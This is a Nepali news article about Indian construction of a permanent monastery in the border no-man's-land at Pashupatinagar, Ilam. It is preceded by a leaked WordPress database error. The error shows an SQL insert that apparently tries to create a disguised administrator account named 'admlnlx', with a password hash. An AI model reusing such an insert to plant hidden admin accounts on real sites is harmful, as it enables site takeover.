WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuJqOr/uIvHsfVQymLzcu9y9UVNEln.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 11:11:15', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ९ –
भारतीय पक्षले इलामको पशुपतिनगरमा ४ फाटक र राङवाङग्राम पञ्चायतको बीचमा रहेको दसगजा क्षेत्रमा कच्ची गुम्बा पक्की बनाउन थालेको छ ।भारतीय पक्षले एक महिनाअघि गुम्बा निर्माणको तयारी गरेपछि नेपाली पक्षले दसगजामा निर्माण नगर्न गरेको आग्रहविपरीत बिहीबार पूजा गरेर निर्माण थालेको हो ।
निर्माणस्थल पुगेका सीमा प्रशासन कार्यालय पशुपतिनगरका प्रमुख मोहन पनेरुले १४ वटा पक्की पिलर लगाएर गुम्बा निर्माण गर्न लागिएको जानकारी दिए । स्थानीय अगुवा बुद्ध तामाङले पिलर लगाएर छानामा टिन लगाउने जानकारी दिएको पनेरुले बताए ।
केही समयअघि पशुपतिनगर आएको नापी विभागको टोलीले सीमा स्थतम्भबाट भारततर्फको दसगजामा पर्ने क्षेत्रमा निर्माण गर्न लागेको गुम्बा ‘नो मेन्स ल्यान्डमै परेको’ प्रतिवेदन दिएको इलामका प्रमुख जिल्ला अधिकारी जनकराज दाहालले जानकारी दिए । अन्नपूर्ण पोस्ट दैनिकमा खबर छ ।